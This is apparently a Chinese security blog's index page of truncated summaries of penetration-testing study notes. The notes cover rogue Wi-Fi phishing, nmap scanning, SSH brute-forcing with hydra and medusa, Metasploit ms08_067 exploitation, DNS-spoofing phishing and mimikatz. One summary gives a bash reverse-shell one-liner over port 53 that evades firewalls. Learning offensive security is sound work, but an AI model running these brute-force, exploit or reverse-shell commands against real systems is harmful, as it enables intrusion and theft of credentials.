摘要：WIFI Pumpkin无线钓鱼渗透 描述 WiFi Pumpkin是一款专用于无线环境渗透测试的完整框架，利用该工具可以伪造接入点完成中间人攻击，同时也支持一些其他的无线渗透测试功能。旨在提供更安全的无线网络服务，该工具可以用来监听目标的流量数据，通过无线钓鱼的方式来捕获不知情的用户，以此来达到监 阅读全文

摘要：nmap学习笔记 基本操作 nmap 192.168.242.1 (检测端口开放情况) 1 10000 nmap 192.168.242.1 192.168.242.2 (检测两个目标) vv参数可以对结果详细输出 常用命令 nmap p 80,3389,22,21,8080,3306 202.19 阅读全文

摘要：SSH可以使用hydra和medusa hydra 示例： hydra l root P passwd.txt t 4 v 202.195.144.101 ssh medusa 示例： medusa u root p passwd.txt h 192.168.242.132 M ssh 3389 h 阅读全文

摘要：Metasploit学习笔记 0x0 ms08_067漏洞复现 1. search ms08_067 2. use exploit/windows/smb/ms08_067_netapi 3. show payloads 4. set payload generic/shell_reverse_tc 阅读全文

摘要：钓鱼+DNS欺骗学习笔记 0x00 写在前面 原文链接： http://www.cnblogs.com/hkleak/p/5186523.html 感谢大佬无私教学 0x01 步骤如下 第一步：布置钓鱼页面 提示：weenman在windows无法配置运行 1. git clone https:// 阅读全文

摘要：Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前，先了解相关知识要点。 nc全称为netcat，所做的就是在两台电脑之间建立链接，并返回两个数据流 可运行在TCP或者UDP模式，添加参数 —u 则调整为udP，默认为tcp \ v 参数，详细输出 n参数高数net 阅读全文

该文被密码保护。

摘要：shell反弹 由于防火墙策略，导致并不能按预期的反弹shell，端口被封禁，可以使用53端口进行反弹shell 命令如下： bash c 'sh i & /dev/tcp/210.28.30.887/53 0 &1' nc监听本地53端口即可 阅读全文

摘要：将上面内容保存为.bat，和mimikatz放在一起 阅读全文